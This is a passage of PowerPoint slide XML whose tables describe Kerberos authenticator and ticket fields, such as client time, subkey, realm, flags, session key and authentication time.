                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="270128">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Client Time</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Current time on Client (from the authenticator).</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="81530">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>CUSEC</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Millisecond part of client time (from the authenticator).</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="81530">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Subkey</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) Specifies a key to encrypt client sessions with application server.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="317309">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Sequence Number</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) Application-specific, so used if sequence number was specified in the authenticator.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="正方形/長方形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="302077" y="1827103"/>
            <a:ext cx="1317746" cy="911459"/>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四角形吹き出し 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1432354" y="2940775"/>
            <a:ext cx="3050697" cy="324665"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -47393"/>
              <a:gd name="adj2" fmla="val -128333"/>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400" dirty="0">
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>encrypted with the session key</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="989619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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ticket Fields</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="コンテンツ プレースホルダー 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="360000" y="1260000"/>
          <a:ext cx="8379322" cy="4502778"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{6E25E649-3F16-4E02-A733-19D2CDBF48F0}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1832472">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6546850">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="33423">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Field</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1519" marR="1519" marT="1519" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike">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00"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="34942">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ticket Version Number</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1519" marR="1519" marT="1519" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1100" b="0" i="0" u="none" strike="noStrike">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01"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="108471">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Realm</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1519" marR="1519" marT="1519" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Name of the realm (domain) that issued the ticket. A KDC can issue tickets only for servers in its own realm, so this is also the name of the server's realm.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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02"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="34942">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Server Name</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1519" marR="1519" marT="1519" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Name of the server.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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03"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="439874">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Flags</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1519" marR="1519" marT="1519" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Options that specify how and when the ticket can be used. See table below for details about ticket flags.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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04"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="68364">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Key</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1519" marR="1519" marT="1519" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The session key used to encrypt and decrypt client and target server messages.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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05"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="34942">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Client Realm</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1519" marR="1519" marT="1519" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Name of the requester's realm.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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06"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="34942">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Client Name</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1519" marR="1519" marT="1519" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Requester's name.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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07"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="81733">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Transited</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1519" marR="1519" marT="1519" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Lists the Kerberos realms that took part in the authentication of the client during cross-realm authentication.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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08"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="33423">
                <a:tc rowSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Authentication Time</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1519" marR="1519" marT="1519" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Time of initial authentication by the client.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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09"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="135209">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The KDC places a timestamp in this field when it issues a TGT. When it issues tickets based on a TGT, the KDC copies the authentication time of the TGT to the authentication time of the ticket.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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10"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="108471">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>An application could have a policy to reject tickets that were based on "old" TGTs, requiring the client to obtain a new TGT and then a new service ticket.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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11"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="34942">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Start Time</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1519" marR="1519" marT="1519" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
